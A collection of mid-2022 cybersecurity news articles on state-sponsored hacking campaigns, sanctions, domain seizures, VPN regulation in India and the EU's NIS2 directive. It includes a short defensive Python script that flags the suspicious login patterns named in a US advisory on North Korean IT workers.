"The observed activity was coordinated with other actors affiliated with Iran's Ministry of Intelligence and Security (MOIS), based primarily on victim overlap and commonality of tools and techniques," MSTIC assessed with "moderate confidence."
The adversarial collective is believed to have breached more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon since February 2022.
Targets of interest included entities in the manufacturing, IT, transportation, defense, government, agriculture, financial, and healthcare sectors, with one cloud service provider compromised to target a downstream aviation company and law firm in what amounts to a supply chain attack.
In a vast majority of the cases, initial access is believed to have been obtained by exploiting a path traversal flaw in Fortinet appliances (CVE-2018-13379), abusing it to drop custom PowerShell implants like CreepySnail that establish connections to a command-and-control (C2) server for follow-on actions.
Attack chains mounted by the actor have involved custom tools, dubbed CreepyDrive and CreepyBox, that leverage legitimate cloud services such as OneDrive and Dropbox accounts for C2 communications with its victims.
"The implant provides basic functionality of allowing the threat actor to upload stolen files and download files to run," the researchers said.
This is not the first time Iranian threat actors have taken advantage of cloud services. In October 2021, Cybereason disclosed an attack campaign staged by a group called MalKamak that used Dropbox for C2 communications in an attempt to stay under the radar.
Additionally, MSTIC noted that multiple victims that were compromised by Polonium were previously targeted by another Iranian group called MuddyWater (aka Mercury), which has been characterized by the U.S. Cyber Command as a "subordinate element" within MOIS.
The victim overlaps lend credence to earlier reports that MuddyWater is a "conglomerate" of multiple teams along the lines of Winnti (China) and the Lazarus Group (North Korea).
To counter such threats, customers are advised to enable multi-factor authentication as well as review and audit partner relationships to minimize any unnecessary permissions.
ExpressVPN Removes Servers in India After Refusing to Comply with Government Order
3.6.22 BigBrothers Thehackernews
Virtual Private Network (VPN) provider ExpressVPN on Thursday announced that it's removing Indian-based VPN servers in response to a new cybersecurity directive issued by the Indian Computer Emergency Response Team (CERT-In).
"Rest assured, our users will still be able to connect to VPN servers that will give them Indian IP addresses and allow them to access the internet as if they were located in India," the company said. "These 'virtual' India servers will instead be physically located in Singapore and the U.K."
The development comes as the CERT-In has enforced new controversial data retention requirements that are set to come into effect on June 27, 2022, and mandate VPN service providers to store subscribers' real names, contact details, and IP addresses assigned to them for at least five years.
The logged user data, CERT-In emphasized, will only be requested for the purposes of "cyber incident response, protective and preventive actions related to cyber incidents."
The agency has since clarified that this rule does not apply to corporate and enterprise VPN solutions and is only aimed at those operators who provide proxy-like services to "general Internet subscribers/users."
"The new data law [...], intended to help fight cybercrime, is incompatible with the purpose of VPNs, which are designed to keep users' online activity private," ExpressVPN said. "The law is also overreaching and so broad as to open up the window for potential abuse."
The rules, dubbed Cyber Security Directions, also mandate firms to report incidents of security lapses such as data breaches and ransomware attacks within six hours of noticing them.
The move has not only sparked privacy concerns, but has also been criticized as ambiguous and overly broad, with critics pointing out a lack of clarity on the scope of incidents that come under the purview of the upcoming directive.
"Such excessive requirements for collecting and handing over data will not just impact VPN service providers but VPN users as well, harming their individual liberty and privacy," the Internet Freedom Foundation said in a statement.
"In the absence of sufficient oversight and a data protection framework to protect against misuse, such requirements have the potential to enable mass surveillance."
DOJ Seizes 3 Web Domains Used to Sell Stolen Data and DDoS Services
3.6.22 BigBrothers Thehackernews
The U.S. Department of Justice (DoJ) on Wednesday announced the seizure of three domains used by cybercriminals to trade stolen personal information and facilitate distributed denial-of-service (DDoS) attacks for hire.
This includes weleakinfo[.]to, ipstress[.]in, and ovh-booter[.]com, the first of which allowed its users to traffic hacked personal data and offered a searchable database containing illegally amassed information obtained from over 10,000 data breaches.
The database consisted of seven billion indexed records featuring names, email addresses, usernames, phone numbers, and passwords for online accounts that could be accessed through different subscription tiers.
The shutdown of weleakinfo[.]to comes more than two years after a related internet domain named weleakinfo[.]com was confiscated in January 2020, with law enforcement officials arresting 21 individuals in connection to the operation later that year. Last May, one of its operators was sentenced to two years in prison.
The other two domains ipstress[.]in and ovh-booter[.]com offered to conduct DDoS services for their clients. DDoS attacks are carried out by flooding a targeted web resource with junk traffic with the goal of rendering it inaccessible to legitimate users of the service.
The "comprehensive law enforcement action" involved the Federal Bureau of Investigation (FBI), the U.S. Attorney's Office for the District of Columbia, and the DoJ's Computer Crime and Intellectual Property Section in coordination with authorities from Belgium and the Netherlands.
"These seizures are prime examples of the ongoing actions the FBI and our international partners are undertaking to disrupt malicious cyber activity," said FBI Special Agent in Charge Wayne A. Jacobs.
"Disrupting malicious DDoS operations and dismantling websites that facilitate the theft and sale of stolen personal information is a priority for the FBI."
FBI Warns About Hackers Selling VPN Credentials for U.S. College Networks
31.5.22 BigBrothers Thehackernews
Network credentials and virtual private network (VPN) access for colleges and universities based in the U.S. are being advertised for sale on underground and public criminal marketplaces.
"This exposure of sensitive credential and network access information, especially privileged user accounts, could lead to subsequent cyber attacks against individual users or affiliated organizations," the U.S. Federal Bureau of Investigation (FBI) said in an advisory published last week.
The cyber intrusions against educational institutions involve threat actors leveraging tactics like spear-phishing and ransomware to carry out credential harvesting activities. The gathered credentials are then exfiltrated and sold on Russian cybercrime forums for prices ranging from a few to thousands of U.S. dollars.
Armed with this login information, the agency pointed out, adversaries can proceed to conduct brute-force credential stuffing attacks to break into victim accounts spanning different internet sites and services.
"If attackers are successful in compromising a victim account, they may attempt to drain the account of stored value, leverage or re-sell credit card numbers and other personally identifiable information, submit fraudulent transactions, exploit for other criminal activity against the account holder, or use for subsequent attacks against affiliated organizations," the FBI cautioned.
For instance, in May 2021, the agency said it found more than 36,000 email and password combinations for email accounts ending in the ".edu" domain publicly available on an instant messaging platform, shared by a group that specialized in the trafficking of stolen login credentials.
To mitigate such threats, academic entities are urged to keep operating systems and software up to date, raise awareness about phishing, secure accounts with two-factor authentication, monitor remote access, and implement network segmentation to prevent the spread of malware.
Fronton: Russian IoT Botnet Designed to Run Social Media Disinformation Campaigns
23.5.22 BigBrothers Thehackernews
Fronton, a distributed denial-of-service (DDoS) botnet that came to light in March 2020, is much more powerful than previously thought, per the latest research.
"Fronton is a system developed for coordinated inauthentic behavior on a massive scale," threat intelligence firm Nisos said in a report published last week.
"This system includes a web-based dashboard known as SANA that enables a user to formulate and deploy trending social media events en masse. The system creates these events that it refers to as Инфоповоды, 'newsbreaks,' utilizing the botnet as a geographically distributed transport."
The existence of Fronton, an IoT botnet, became public knowledge following revelations from BBC Russia and ZDNet in March 2020 after a Russian hacker group known as Digital Revolution published documents that it claimed were obtained after breaking into a subcontractor to the FSB, the Federal Security Service of the Russian Federation.
Further investigation has traced the analytical system to a Moscow-based company known as Zeroday Technologies (aka 0Dt), with links identified to a Russian hacker by the name of Pavel Sitnikov, who was arrested in March 2021 on charges of distributing malicious software via his Telegram channel.
Fronton functions as the backend infrastructure of the social media disinformation platform, offering an army of compromised IoT devices for staging DDoS attacks and information campaigns by communicating with a front-end server infrastructure over VPNs or the Tor anonymity network.
SANA, on the other hand, is designed to create fake social media persona accounts and manufacture newsbreaks, which refer to events that create information "noise" with the goal of shaping online discourse by means of a response model that allows the bots to react to the news in a "positive, negative, or neutral fashion."
What's more, the platform enables the operators to control the amount of likes, comments, and reactions a bot account can create as well as specify a numeric range of the number of friends such accounts should maintain. It also incorporates an "Albums" feature to store imagery for the bot accounts.
It's not immediately clear if the tool was ever used in real-world attacks, whether by the FSB or otherwise.
The findings come as Meta Platforms said it took steps against covert adversarial networks originating from Azerbaijan and Iran on its platform, by taking down the accounts and blocking their domains from being shared.
Cybersecurity company Mandiant, in an independent report published last week, revealed that actors aligned with nation-states such as Russia, Belarus, China, and Iran have mounted "concerted information operations" in the aftermath of Russia's full-scale invasion of Ukraine.
"Russia-aligned operations, including those attributed to Russian, Belarusian, and pro-Russia actors, have thus far employed the widest array of tactics, techniques, and procedures (TTPs) to support tactical and strategic objectives, directly linked to the conflict itself," Mandiant noted.
"Meanwhile, pro-PRC and pro-Iran campaigns have leveraged the Russian invasion opportunistically to further progress long-held strategic objectives."
U.S. Warns Against North Korean Hackers Posing as IT Freelancers
19.5.22 BigBrothers Thehackernews
Highly skilled software and mobile app developers from the Democratic People's Republic of Korea (DPRK) are posing as "non-DPRK nationals" in hopes of landing freelance employment in an attempt to enable the regime's malicious cyber intrusions.
That's according to a joint advisory from the U.S. Department of State, the Department of the Treasury, and the Federal Bureau of Investigation (FBI) issued on Monday.
Targets include financial, health, social media, sports, entertainment, and lifestyle-focused companies located in North America, Europe, and East Asia, with most of the dispatched workers situated in China, Russia, Africa, and Southeast Asia.
The goal, the U.S. agencies warn, is to generate a constant stream of revenue that sidesteps international sanctions imposed on the nation and helps serve its economic and security priorities, including the development of nuclear and ballistic missiles.
"The North Korean government withholds up to 90 percent of wages of overseas workers which generates an annual revenue to the government of hundreds of millions of dollars," the guidance noted.
Some of the core areas where DPRK IT workers have been found to engage are software development; crypto platforms; graphic animation; online gambling; mobile games; dating, AI, and VR apps; hardware and firmware development; biometric recognition software; and database management.
DPRK IT workers are also known to take on projects that involve virtual currency, reflecting the country's continued interest in the technology and its history of targeted attacks aimed at the financial sector.
Additionally, they are said to abuse the privileged access obtained as contractors to provide logistical support to North Korean state-sponsored groups, share access to virtual infrastructure, facilitate the sale of stolen data, and assist in money laundering and virtual currency transfers.
Besides deliberately obfuscating their identities, locations, and nationality online by using VPNs and misrepresenting themselves as South Korean citizens, potential red flags indicating the involvement of DPRK IT workers are as follows -
Multiple logins into one account from various IP addresses in a short period
Logging into multiple accounts on the same platform from one IP address
Logged into accounts continuously for one or more days at a time
Use of ports such as 3389 that are associated with remote desktop sharing software
Using rogue client accounts on freelance work platforms to boost developer account ratings
Multiple developer accounts receiving high ratings from one client account in a short time
Frequent money transfers through payment platforms to China-based bank accounts, and
Seeking payment in virtual currency
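As an added example (not part of the advisory or the article), here is a Python triage script that applies the first four login-related indicators above to a constructed platform access log; the log format, account names, test IP addresses and thresholds are all assumptions:

```python
"""Flag login patterns matching the DPRK IT-worker indicators listed above.

Added example, not part of the advisory or the article. Assumes a constructed
access log where each record is one authenticated session on a freelance
platform: (account, source_ip, login_time, session_hours, client_port).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (hypothetical accounts, RFC 5737 test addresses).
SAMPLE_LOG = [
    ("dev_alpha", "192.0.2.10", "2022-05-10T08:00:00", 2.0, 443),
    ("dev_alpha", "198.51.100.7", "2022-05-10T08:40:00", 1.5, 443),
    ("dev_alpha", "203.0.113.5", "2022-05-10T09:15:00", 30.0, 443),
    ("dev_beta", "203.0.113.5", "2022-05-10T09:20:00", 1.0, 3389),
    ("dev_gamma", "203.0.113.5", "2022-05-10T09:30:00", 0.5, 443),
    ("dev_delta", "192.0.2.44", "2022-05-11T10:00:00", 1.0, 443),
    ("dev_delta", "192.0.2.44", "2022-05-12T10:00:00", 1.0, 443),
]

# Port 3389 is the one the advisory names; the set can be extended.
REMOTE_DESKTOP_PORTS = {3389}


def parse_log(records):
    """Turn raw tuples into dicts with parsed timestamps, sorted by login time."""
    parsed = []
    for account, ip, ts, hours, port in records:
        parsed.append({
            "account": account,
            "ip": ip,
            "login": datetime.fromisoformat(ts),
            "hours": float(hours),
            "port": int(port),
        })
    return sorted(parsed, key=lambda e: e["login"])


def accounts_with_many_ips(events, window=timedelta(hours=2), min_ips=3):
    """Indicator: one account logged into from several IPs in a short period.

    Slides a time window over each account's logins (already sorted) and
    returns accounts that reach min_ips distinct source addresses inside
    any single window.
    """
    by_account = defaultdict(list)
    for e in events:
        by_account[e["account"]].append(e)
    flagged = set()
    for account, logins in by_account.items():
        for i, start in enumerate(logins):
            ips = {x["ip"] for x in logins[i:]
                   if x["login"] - start["login"] <= window}
            if len(ips) >= min_ips:
                flagged.add(account)
                break
    return sorted(flagged)


def ips_with_many_accounts(events, min_accounts=3):
    """Indicator: many accounts on the same platform used from one IP."""
    accounts_by_ip = defaultdict(set)
    for e in events:
        accounts_by_ip[e["ip"]].add(e["account"])
    return sorted(ip for ip, accts in accounts_by_ip.items()
                  if len(accts) >= min_accounts)


def continuous_sessions(events, min_hours=24.0):
    """Indicator: account stays logged in for one or more days at a time."""
    return sorted({e["account"] for e in events if e["hours"] >= min_hours})


def remote_desktop_logins(events):
    """Indicator: sessions over ports associated with remote desktop sharing."""
    return sorted({(e["account"], e["ip"]) for e in events
                   if e["port"] in REMOTE_DESKTOP_PORTS})


def triage(records):
    """Run every indicator and return a findings dict keyed by indicator."""
    events = parse_log(records)
    return {
        "multi_ip_accounts": accounts_with_many_ips(events),
        "shared_ip_addresses": ips_with_many_accounts(events),
        "continuous_sessions": continuous_sessions(events),
        "remote_desktop_logins": remote_desktop_logins(events),
    }


if __name__ == "__main__":
    for indicator, hits in triage(SAMPLE_LOG).items():
        print(f"{indicator}: {hits}")
```

Each hit is a lead for a human reviewer, not proof of anything on its own; the rating and payment indicators that follow in the list need platform-side data this log does not carry.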
In one instance highlighted in the advisory, North Korean developers working for an unnamed U.S. company carried out an unauthorized theft of over $50,000 in 30 small installments without the firm's knowledge over the course of several months.
"Hiring or supporting the activities of DPRK IT workers poses many risks, ranging from theft of intellectual property, data, and funds to reputational harm and legal consequences, including sanctions under both United States and United Nations authorities," the U.S. State Department said.
The advisory also comes as the department announced a $5 million reward last month for information that leads to the disruption of North Korea's cryptocurrency theft, cyber espionage, and other illicit nation-state activities.
Europe Agrees to Adopt New NIS2 Directive Aimed at Hardening Cybersecurity
17.5.22 BigBrothers Thehackernews
The European Parliament announced a "provisional agreement" aimed at improving cybersecurity and resilience of both public and private sector entities in the European Union.
The revised directive, called "NIS2" (short for network and information systems), is expected to replace the existing legislation on cybersecurity that was established in July 2016.
The revamp sets ground rules, requiring companies in energy, transport, financial markets, health, and digital infrastructure sectors to adhere to risk management measures and reporting obligations.
Among the provisions in the new legislation are flagging cybersecurity incidents to authorities within 24 hours, patching software vulnerabilities, and readying risk management measures to secure networks, failing which organizations can incur monetary penalties.
"The directive will formally establish the European Cyber Crises Liaison Organization Network, EU-CyCLONe, which will support the coordinated management of large-scale cybersecurity incidents," the Council of the European Union said in a statement last week.
The development closely follows the European Commission's plans to "detect, report, block, and remove" child sexual abuse images and videos from online service providers, including messaging apps, prompting concerns that it may undermine end-to-end encryption (E2EE) protections.
The draft version of NIS2 explicitly spells out that the use of E2EE "should be reconciled with the Member States' powers to ensure the protection of their essential security interests and public security, and to permit the investigation, detection and prosecution of criminal offenses in compliance with Union law."
It also stresses that "solutions for lawful access to information in end-to-end encrypted communications should maintain the effectiveness of encryption in protecting privacy and security of communications, while providing an effective response to crime."
That said, the directive will not apply to organizations in verticals such as defense, national security, public security, law enforcement, judiciary, parliaments, and central banks.
As part of the proposed agreement, the European Union member states are mandated to incorporate the provisions into their national law within a period of 21 months from when the directive goes into force.
"The number, magnitude, sophistication, frequency and impact of cybersecurity incidents are increasing, and present a major threat to the functioning of network and information systems," the Council noted in the draft.
"Cybersecurity preparedness and effectiveness are therefore now more essential than ever to the proper functioning of the internal market."
Government Agencies Warn of Increase in Cyberattacks Targeting MSPs
12.5.22 BigBrothers Thehackernews
Multiple cybersecurity authorities from Australia, Canada, New Zealand, the U.K., and the U.S. on Wednesday released a joint advisory warning of threats targeting managed service providers (MSPs) and their customers.
Key among the recommendations are identifying and disabling accounts that are no longer in use, enforcing multi-factor authentication (MFA) on MSP accounts that access customer environments, and ensuring transparency in ownership of security roles and responsibilities.
MSPs have emerged as an attractive attack route for cybercriminals to scale their attacks, as a vulnerable provider can be weaponized as an initial access vector to breach several downstream customers at once.
The spillover effects of such intrusions, as witnessed in the wake of high-profile breaches aimed at SolarWinds and Kaseya in recent years, have once again underlined the need to secure the software supply chain.
Malicious cyber actors are targeting MSPs in an effort to "exploit provider-customer network trust relationships" for follow-on activity such as ransomware and cyber espionage against the provider as well as its customer base, the agencies cautioned.
The major security measures and operational controls outlined in the advisory are as follows -
Prevent initial compromise by securing internet-facing devices and implementing protections against brute-forcing and phishing attacks
Enable effective monitoring and logging of systems
Secure remote access applications and mandate MFA where possible
Isolate critical business systems and apply appropriate network security safeguards
Apply the principle of least privilege throughout the network environment
Deprecate obsolete accounts through periodic audits
Prioritize security updates for operating systems, applications, and firmware, and
Regularly maintain and test offline backups for incident recovery.
The Five Eyes alert arrives a week after the U.S. National Institute of Standards and Technology (NIST) published updated cybersecurity guidance for managing risks in the supply chain.
"MSPs should understand their own supply chain risk and manage the cascading risks it poses to customers," the agencies said. "Customers should understand the supply chain risk associated with their MSP, including risk associated with third-party vendors or subcontractors."
E.U. Blames Russia for Cyberattack on KA-SAT Satellite Network Operated by Viasat
12.5.22 BigBrothers Thehackernews
The Five Eyes nations comprising Australia, Canada, New Zealand, the U.K., and the U.S., along with Ukraine and the European Union, formally blamed Russia for masterminding an attack on an international satellite communication (SATCOM) provider that had "spillover" effects across Europe.
The cyber offensive, which took place one hour before the Kremlin's military invasion of Ukraine on February 24, targeted the KA-SAT satellite network operated by telecommunications company Viasat, crippling the operations of wind farms and internet users in central Europe.
Viasat, in late March, disclosed that it had shipped nearly 30,000 modems to distributors to restore service to customers whose modems were rendered unusable.
"This cyberattack had a significant impact causing indiscriminate communication outages and disruptions across several public authorities, businesses and users in Ukraine, as well as affecting several E.U. Member States," the Council of the European Union said.
Calling it a deliberate and unacceptable cyberattack, the nations pointed fingers at Russia for its "continued pattern of irresponsible behavior in cyberspace, which also formed an integral part of its illegal and unjustified invasion of Ukraine."
The U.S. State Department said the digital assaults against commercial satellite communications networks were orchestrated to disrupt Ukrainian military command-and-control capabilities during the invasion.
An analysis from cybersecurity firm SentinelOne published last month revealed that the intrusion aimed at Viasat involved the use of a data-wiping malware dubbed AcidRain that's designed to remotely sabotage tens of thousands of vulnerable modems.
Furthermore, the discovery unearthed similarities between AcidRain and "dstr," a third-stage wiper module in VPNFilter, a botnet malware previously attributed to Russia's Sandworm group.
Besides the Viasat attacks, Australia and Canada also blamed the Russian government for targeting the Ukrainian banking sector in February 2022, COVID-19 vaccine research and development in 2020, and interfering in Georgia's 2020 parliamentary elections.
The attribution comes as Ukraine has been at the receiving end of a number of destructive attacks directed at public and private sector networks since the start of the year, launched as part of Russia's "hybrid" warfare strategy in concert with ground warfare.
The U.K.'s National Cyber Security Centre (NCSC) noted that Russian military intelligence agencies were "almost certainly" involved in the deployment of WhisperGate wiper malware and the defacements of several Ukrainian websites in January 2022.
AcidRain and WhisperGate are part of a long list of data wiper strains that have hit Ukraine in recent months, which also includes HermeticWiper (FoxBlade aka KillDisk), IsaacWiper (Lasainraw), CaddyWiper, DesertBlade, DoubleZero (FiberLake), and Industroyer2.
"Russian hackers have been waging war against Ukraine in the cyberspace for the past eight years," the State Service for Special Communication and Information Protection of Ukraine (SSSCIP) said in a statement, adding they "pose a threat not only to Ukraine, but to the whole world."
"Their purpose is to damage and destroy, to wipe out data, to deny Ukrainian citizens' access to public services as well as to destabilize [the] situation in the country, to spread panic and distrust in the authorities among the people."
U.S. Sanctions Cryptocurrency Mixer Blender for Helping North Korea Launder Millions
7.5.22 BigBrothers Thehackernews
The U.S. Treasury Department on Friday moved to sanction virtual currency mixer Blender.io, marking the first time a mixing service has been subjected to economic blockades.
The move signals continued efforts on the part of the government to prevent North Korea's Lazarus Group from laundering the funds stolen from the unprecedented hack of Ronin Bridge in late March.
The newly imposed sanctions, issued by the U.S. Office of Foreign Assets Control (OFAC), target 45 Bitcoin addresses linked to Blender.io and four new wallets linked to Lazarus Group, an advanced persistent threat with ties to the Democratic People's Republic of Korea (DPRK).
"Blender was used in processing over $20.5 million of the illicit proceeds," the Treasury said, adding it was utilized by DPRK to "support its malicious cyber activities and money-laundering of stolen virtual currency."
Cryptocurrency mixers, also called tumblers, are privacy-focused services that allow users to move cryptocurrency assets between accounts without leaving a transaction trail by obfuscating their origins.
Mixers like Blender are known to take a "dynamic" service fee that ranges anywhere between 0.6% and 2.5% every time money is transferred to a wallet address under its control. Since its launch in 2017, Blender is estimated to have transferred more than $500 million worth of Bitcoin.
"Through these services, threat actors can achieve their end goal of cashing out and keeping the criminal underground liquid through the trade of illicit goods and services," Intel 471 noted in a report published in November 2021.
The Ronin Bridge hack saw the state-sponsored hacking group steal $540 million from a decentralized protocol that permits users to transfer their crypto between Ethereum and the popular blockchain game Axie Infinity.
On April 16, the Treasury Department blocklisted the Ethereum wallet address that received the stolen digital currency, although by then the Lazarus Group had managed to launder 18% of the siphoned funds (about $97 million) through centralized exchanges and an Ethereum mixing service called Tornado Cash.
Over the past two weeks, around $273.9 million of Ether was sent to four of the newly-sanctioned addresses, according to blockchain analytics firm Elliptic, with one of those addresses already moving $37 million through Tornado Cash, leaving behind $236 million.
"The transactions involved amounts significantly larger than their previous laundering efforts," the company said. "The ramping up of laundering efforts in this manner potentially reflects a growing desperation by the hackers."
Furthermore, the sanctioning of Blender is evidence that the "Lazarus Group had moved some of the stolen funds into Bitcoin," Elliptic pointed out.
On top of that, Blender is also said to have helped a number of the Russia-aligned ransomware gangs launder their money, including TrickBot, Conti (formerly Ryuk), Sodinokibi (aka REvil), and Gandcrab.
In the midst of all this, crypto exchange Binance on April 22 revealed that it had managed to recover $5.8 million worth of the Axie Infinity stolen funds that were spread across 86 accounts.
The development comes a month after the Treasury sanctioned virtual currency exchange Garantex for assisting criminal actors in laundering over $100 million in ill-gotten funds.
Last year, the department penalized two cryptocurrency exchanges SUEX and CHATEX for facilitating financial transactions for ransomware actors and cashing out the money extorted from victims.
In recent years, North Korea has been attached to a string of cyber-enabled heists from cryptocurrency exchanges and financial entities as a way of getting around international sanctions and generating revenue for its nuclear weapons program.
Last month, U.S. cybersecurity and intelligence agencies warned of a new set of cyberattacks carried out by the Lazarus Group targeting blockchain companies with rogue cryptocurrency apps.
"Virtual currency mixers that assist illicit transactions pose a threat to U.S. national security interests," said Brian E. Nelson, undersecretary of the Treasury for Terrorism and Financial Intelligence.
"We are taking action against illicit financial activity by the DPRK and will not allow state-sponsored thievery and its money-laundering enablers to go unanswered."
Experts Uncover New Espionage Attacks by Chinese 'Mustang Panda' Hackers
7.5.22 BigBrothers Thehackernews
The China-based threat actor known as Mustang Panda has been observed refining and retooling its tactics and malware to strike entities located in Asia, the European Union, Russia, and the U.S.
"Mustang Panda is a highly motivated APT group relying primarily on the use of topical lures and social engineering to trick victims into infecting themselves," Cisco Talos said in a new report detailing the group's evolving modus operandi.
The group is known to have targeted a wide range of organizations since at least 2012, with the actor primarily relying on email-based social engineering to gain initial access to drop PlugX, a backdoor predominantly deployed for long-term access.
Phishing messages attributed to the campaign contain malicious lures masquerading as official European Union reports on the ongoing conflict in Ukraine or Ukrainian government reports, both of which download malware onto compromised machines.
Also observed are phishing messages tailored to target various entities in the U.S. and several Asian countries like Myanmar, Hong Kong, Japan, and Taiwan.
The findings follow a recent report from Secureworks that the group may have been targeting Russian government officials using a decoy containing PlugX that disguised itself as a report on the border detachment to Blagoveshchensk.
But similar attacks detected towards the end of March 2022 show that the actors are updating their tactics by reducing the remote URLs used to obtain different components of the infection chain.
Other than PlugX, infection chains utilized by the APT group have involved the deployment of custom stagers, reverse shells, Meterpreter-based shellcode, and Cobalt Strike, all of which are used to establish remote access to their targets with the intention of conducting espionage and information theft.
"By using summit- and conference-themed lures in Asia and Europe, this attacker aims to gain as much long-term access as possible to conduct espionage and information theft," Talos researchers said.
Chinese Hackers Caught Stealing Intellectual Property from Multinational Companies
5.5.22 BigBrothers Thehackernews
An elusive and sophisticated cyberespionage campaign orchestrated by the China-backed Winnti group has managed to fly under the radar since at least 2019.
Dubbed "Operation CuckooBees" by Israeli cybersecurity company Cybereason, the massive intellectual property theft operation enabled the threat actor to exfiltrate hundreds of gigabytes of information.
Targets included technology and manufacturing companies primarily located in East Asia, Western Europe, and North America.
"The attackers targeted intellectual property developed by the victims, including sensitive documents, blueprints, diagrams, formulas, and manufacturing-related proprietary data," the researchers said.
"In addition, the attackers collected information that could be used for future cyberattacks, such as details about the target company's business units, network architecture, user accounts and credentials, employee emails, and customer data."
Winnti, also tracked by other cybersecurity vendors under the names APT41, Axiom, Barium, and Bronze Atlas, is known to be active since at least 2007.
"The group's intent is towards theft of intellectual property from organizations in developed economies, and with moderate confidence that this is on behalf of China to support decision making in a range of Chinese economic sectors," Secureworks notes in a threat profile of the actor.
The multi-phased infection chain documented by Cybereason involves the exploitation of internet-facing servers to deploy a web shell with the goal of conducting reconnaissance, lateral movement, and data exfiltration activities.
It's both complex and intricate, following a "house of cards" approach in that each component of the killchain depends on other modules in order to function, rendering analysis exceedingly difficult.
"This demonstrates the thought and effort that was put into both the malware and operational security considerations, making it almost impossible to analyze unless all pieces of the puzzle are assembled in the correct order," the researchers explained.
The data harvesting is facilitated by means of a modular loader called Spyder, which is used to decrypt and load additional payloads. Also used are four different payloads, STASHLOG, SPARKLOG, PRIVATELOG, and DEPLOYLOG, that are sequentially deployed to drop WINNKIT, a kernel-level rootkit.
Crucial to the stealthiness of the campaign is the use of "rarely seen" techniques such as the abuse of the Windows Common Log File System (CLFS) mechanism to stash the payloads, enabling the hacking group to conceal their payloads and evade detection by traditional security products.
Interestingly, parts of the attack sequence were previously detailed by Mandiant in September 2021, while pointing out the misuse of CLFS to hide second-stage payloads in an attempt to circumvent detection.
The cybersecurity firm attributed the malware to an unknown actor, but cautioned that it could have been deployed as part of a highly targeted activity.
"Because the file format is not widely used or documented, there are no available tools that can parse CLFS log files," Mandiant said at the time. "This provides attackers with an opportunity to hide their data as log records in a convenient way, because these are accessible through API functions."
WINNKIT, for its part, has a compilation timestamp of May 2019 and an almost zero detection rate on VirusTotal, highlighting the evasive nature of the malware that enabled the authors to stay undiscovered for years.
The ultimate goal of the intrusions, the researchers assessed, is to siphon proprietary information, research documents, source code, and blueprints for various technologies.
"Winnti is one of the most industrious groups operating on behalf of Chinese state-aligned interests," Cybereason said. "The threat [actor] employed an elaborate, multi-stage infection chain that was critical to enabling the group to remain undetected for so long."
Ukraine War Themed Files Become the Lure of Choice for a Wide Range of Hackers
5.5.22 BigBrothers Thehackernews
A growing number of threat actors are using the ongoing Russo-Ukrainian war as a lure in various phishing and malware campaigns, even as critical infrastructure entities continue to be heavily targeted.
"Government-backed actors from China, Iran, North Korea and Russia, as well as various unattributed groups, have used various Ukraine war-related themes in an effort to get targets to open malicious emails or click malicious links," Google Threat Analysis Group's (TAG) Billy Leonard said in a report.
"Financially motivated and criminal actors are also using current events as a means for targeting users," Leonard added.
One notable threat actor is Curious Gorge, which TAG has attributed to China's People's Liberation Army Strategic Support Force (PLA SSF) and which has been observed striking government, military, logistics, and manufacturing organizations in Ukraine, Russia, and Central Asia.
Attacks aimed at Russia have singled out several governmental entities, such as the Ministry of Foreign Affairs, with additional compromises impacting Russian defense contractors and manufacturers as well as an unnamed logistics company.
The findings follow disclosures that a China-linked government-sponsored threat actor known as Mustang Panda (aka Bronze President) may have been targeting Russian government officials with an updated version of a remote access trojan called PlugX.
Another set of phishing attacks involved APT28 (aka Fancy Bear) hackers targeting Ukrainian users with a .NET malware that's capable of stealing cookies and passwords from Chrome, Edge and Firefox browsers.
Also implicated were Russia-based threat groups, including Turla (aka Venomous Bear) and COLDRIVER (aka Callisto), as well as a Belarusian hacking crew named Ghostwriter in different credential phishing campaigns targeting defense and cybersecurity organizations in the Baltic region and high-risk individuals in Ukraine.
COLDRIVER, also called Gamaredon, Primitive Bear, Actinium, and Armageddon, has been linked to multiple phishing attacks targeting government officials in Ukraine, besides striking military, non-government organizations (NGO), judiciary, law enforcement, and non-profit organizations in the country for espionage purposes.
Ghostwriter's latest attacks directed victims to compromised websites, from where the users were sent to an attacker-controlled web page to harvest their credentials.
In an unrelated phishing campaign targeting entities in Eastern European countries, a previously unknown and financially motivated hacking group has been spotted impersonating a Russian agency to deploy a JavaScript backdoor called DarkWatchman onto infected computers.
IBM Security X-Force connected the intrusions to a threat cluster it's tracking under the moniker Hive0117.
"The campaign masquerades as official communications from the Russian Government's Federal Bailiffs Service, the Russian-language emails are addressed to users in Lithuania, Estonia, and Russia in the Telecommunications, Electronic and Industrial sectors," the company said.
The cyber activity update comes as Microsoft divulged that six different Russia-aligned actors launched at least 237 cyberattacks against Ukraine from February 23 to April 8, including 38 discrete destructive attacks that irrevocably destroyed files in hundreds of systems across dozens of organizations in the country.
The geopolitical tensions and the ensuing military invasion of Ukraine have also fueled an escalation in data wiper attacks intended to cripple mission critical processes and destroy forensic evidence.
What's more, the Computer Emergency Response Team of Ukraine (CERT-UA) revealed details of ongoing distributed denial-of-service (DDoS) attacks directed against government and news portals by injecting malicious JavaScript (dubbed "BrownFlood") into the compromised sites.
DDoS attacks have been reported beyond Ukraine as well. Last week, Romania's National Directorate of Cyber Security (DNSC) disclosed that several websites belonging to public and private institutions were "targeted by attackers who aimed to make these online services unavailable."
The attacks, claimed by a pro-Russian collective called Killnet, come in response to Romania's decision to support Ukraine in the military conflict with Russia.
Russian Hackers Targeting Diplomatic Entities in Europe, Americas, and Asia
3.5.22 BigBrothers Thehackernews
A Russian state-sponsored threat actor has been observed targeting diplomatic and government entities as part of a series of phishing campaigns commencing on January 17, 2022.
Threat intelligence and incident response firm Mandiant attributed the attacks to a hacking group tracked as APT29 (aka Cozy Bear), with a subset of the activities associated with the crew assigned the moniker Nobelium (aka UNC2452/2652).
"This latest wave of spear phishing showcases APT29's enduring interests in obtaining diplomatic and foreign policy information from governments around the world," Mandiant said in a report published last week.
The initial access is said to have been aided through spear-phishing emails masquerading as administrative notices, using legitimate but compromised email addresses from other diplomatic entities.
These emails contain an HTML dropper attachment called ROOTSAW (aka EnvyScout) that, when opened, triggers an infection sequence that delivers and executes a downloader dubbed BEATDROP on a target system.
Written in C, BEATDROP is designed to retrieve next-stage malware from a remote command-and-control (C2) server. It achieves this by abusing Atlassian's Trello service to store victim information and fetch AES-encrypted shellcode payloads to be executed.
Also employed by APT29 is a tool named BOOMMIC (aka VaporRage) to establish a foothold within the environment, followed by escalating their privileges within the compromised network for lateral movement and extensive reconnaissance of hosts.
